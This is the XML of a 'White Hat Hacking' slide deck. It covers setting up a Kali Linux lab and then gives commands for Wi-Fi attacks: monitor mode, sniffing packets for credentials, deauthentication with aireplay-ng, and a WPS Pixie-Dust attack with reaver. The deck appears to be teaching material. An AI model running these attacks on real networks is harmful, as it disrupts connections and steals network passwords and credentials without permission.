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7" r:id="rId11"/>
    <p:sldId id="268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1" autoAdjust="0"/>
    <p:restoredTop sz="94643" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91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Alfa-AWUS036NHA-Wireless-USB-Adaptor/dp/B004Y6MIXS/ref=sr_1_4?keywords=atheros&amp;qid=1576360647&amp;sr=8-4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/downloa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oxide.com/distros/learn-method-install-kali-linux-virtualbo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ull-byte.wonderhowto.com/how-to/hack-wifi-using-wps-pixie-dust-attack-0162671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White Hat Hacking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Royer Ramirez Ruiz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82125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005839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164933"/>
            <a:ext cx="3302167" cy="28147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Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Royer.Ramirez@gmail.com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Linkedin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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.linkedin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/in/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>royerramirezruiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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F5075-25B7-2841-8AD2-3C9720C7CCE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581191" y="2026481"/>
            <a:ext cx="80815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 VM VirtualBox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Install: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VirtualBox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6.1.0 &amp; Extension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https://www.virtualbox.org/wiki/Downloads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Kali-Linux VM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Install: Kali Linux 64-Bit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https://www.kali.org/downloads/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Alfa Atheros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https://www.amazon.com/Alfa-AWUS036NHA-Wireless-USB-Adaptor/dp/B004Y6MIXS/ref=sr_1_4?keywords=atheros&amp;qid=1576360647&amp;sr=8-4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55DD5-47AF-334E-ABEC-13DE496D14D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="2056686"/>
            <a:ext cx="101714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Kali-Linux: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on step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https://linoxide.com/distros/learn-method-install-kali-linux-virtualbox/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Credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>username:  root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pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>toor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier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Recommendations:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>System: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	Ubuntu 64-Bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Hard Disk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	VMDK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	Dynamically Allocated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	80GB Virtual Disk Space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="12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10 64-Bit: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Credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>IEUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: Passw0rd!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Snapshot during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F7D06-D129-7B46-80AC-FA156988F780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8626642" y="2191267"/>
            <a:ext cx="2851820" cy="1292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400" dirty="0"/>
              <a:t>Updating Kali-Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> apt-get update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> apt-get upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"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BC8F-8AE0-8249-A5F3-0FCC987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Setup Cont’d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D3108-6F45-CE41-A370-64C1C46BBB46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347646" y="5129669"/>
            <a:ext cx="26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Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Only allows network access from network card. Important for penetration.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4AA62-686D-9949-8D6F-9531829EA801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694897" y="6230947"/>
            <a:ext cx="265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Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Enables read/write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66574-CC7E-1043-BEB8-4DBD280BDFF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4269237" y="2091637"/>
            <a:ext cx="26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ourier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Enables our packet injector to work with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier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BC4069-8701-3F4D-93F0-A11BDEC9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8" y="2104152"/>
            <a:ext cx="3675787" cy="2708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B8EFC-766F-3243-BBF4-11B471B2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37" y="4511197"/>
            <a:ext cx="3279660" cy="19967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FB8DFD-6DCF-8446-B10E-011319832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605" y="2091637"/>
            <a:ext cx="2788006" cy="21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4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BC8F-8AE0-8249-A5F3-0FCC987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Penetration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1574-CDB5-1A4F-88E2-1E8937F61243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445168" y="2033336"/>
            <a:ext cx="111656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Attacks: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Pre-Connection Attacks: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&amp; Sniffing  				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 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De-Authentication Attack   		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 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HoneyPot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ Mana-Toolkit ]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Penetration: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WEP							</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng 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WPA/WPA2					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> / pixie-dust attack ]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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetworkConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attacks: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 in the Middle				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[ ARP Poisoning ], [ ARP Spoofing Wired Attack ]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7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BC8F-8AE0-8249-A5F3-0FCC987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Connection attack – Monitor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1574-CDB5-1A4F-88E2-1E8937F61243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445168" y="2124460"/>
            <a:ext cx="111656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Managed Mode vs Monitor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Enabling monitor mode using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-ng package: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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng start wlan0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iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt;NAME&gt;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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng stop &lt;NAME&gt;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Enabling Monitor Mode Manually:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0 down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0 mode monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0 up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0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Monitor Mode using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-ng: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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0 down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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng check kill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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng start wlan0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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> wlan0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329123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BC8F-8AE0-8249-A5F3-0FCC987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Connection attack – Target Packet Sniffing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1574-CDB5-1A4F-88E2-1E8937F61243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445168" y="2124460"/>
            <a:ext cx="11165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Gather Information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Capture Packets that contain credentials or useful info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng --CHANNEL &lt;INT&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt;MAC_ADDRESS&gt; --write &lt;FOLDER NAME&gt; &lt;NAME OF MODE&gt;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2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BC8F-8AE0-8249-A5F3-0FCC987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Connection attack – De-Authentication Attack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1574-CDB5-1A4F-88E2-1E8937F61243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445168" y="2124460"/>
            <a:ext cx="11165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De-Authentication Attack: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Disconnect any device authenticated w/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Spoof MAC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Goal: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Hackers sends De-authentication packets to the router pretending to be the targeted machine by spoofing its MAC addresses. At the same time, the hackers send packets to the target machine [ pretending to be the router ] telling it to re-authenticate itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng --CHANNEL &lt;INT&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt;MAC_ADDRESS&gt; --write &lt;FOLDER NAME&gt; &lt;NAME OF MODE&gt;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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt;NUM OF PACKAGES&gt; -a &lt;IP ADDRESS&gt; -c &lt;DEVICE TO DISCONNECT&gt; wlan0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8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BC8F-8AE0-8249-A5F3-0FCC987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Penetration Attack – Pixie-Dust Attack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1574-CDB5-1A4F-88E2-1E8937F61243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801823" y="2180730"/>
            <a:ext cx="108089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Pixie-Dust Attack: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Attack network through WPS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Goal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Obtain password from router by guessing the 8 digit WEP pin. Once we have the pin, the password is for the network is also accessible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty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{monitor interface} -b {BSSID of router} -c {router channel}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vvv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-K 1 –f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Instructions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://null-byte.wonderhowto.com/how-to/hack-wifi-using-wps-pixie-dust-attack-0162671/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/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7846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s://linoxide.com/distros/learn-method-install-kali-linux-virtualbox/" TargetMode="External"/></Relationships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622</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>123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</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Dividend</vt:lpstr>
      <vt:lpstr>White Hat Hacking </vt:lpstr>
      <vt:lpstr>Requirements</vt:lpstr>
      <vt:lpstr>VM Setup</vt:lpstr>
      <vt:lpstr>VM Setup Cont’d</vt:lpstr>
      <vt:lpstr>Network Penetration </vt:lpstr>
      <vt:lpstr>Pre Connection attack – Monitor </vt:lpstr>
      <vt:lpstr>Pre Connection attack – Target Packet Sniffing </vt:lpstr>
      <vt:lpstr>Pre Connection attack – De-Authentication Attack </vt:lpstr>
      <vt:lpstr>Network Penetration Attack – Pixie-Dust Attack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Archive - Royer Ramirez</dc:creator>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-14T21:01:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-12T20:59:15Z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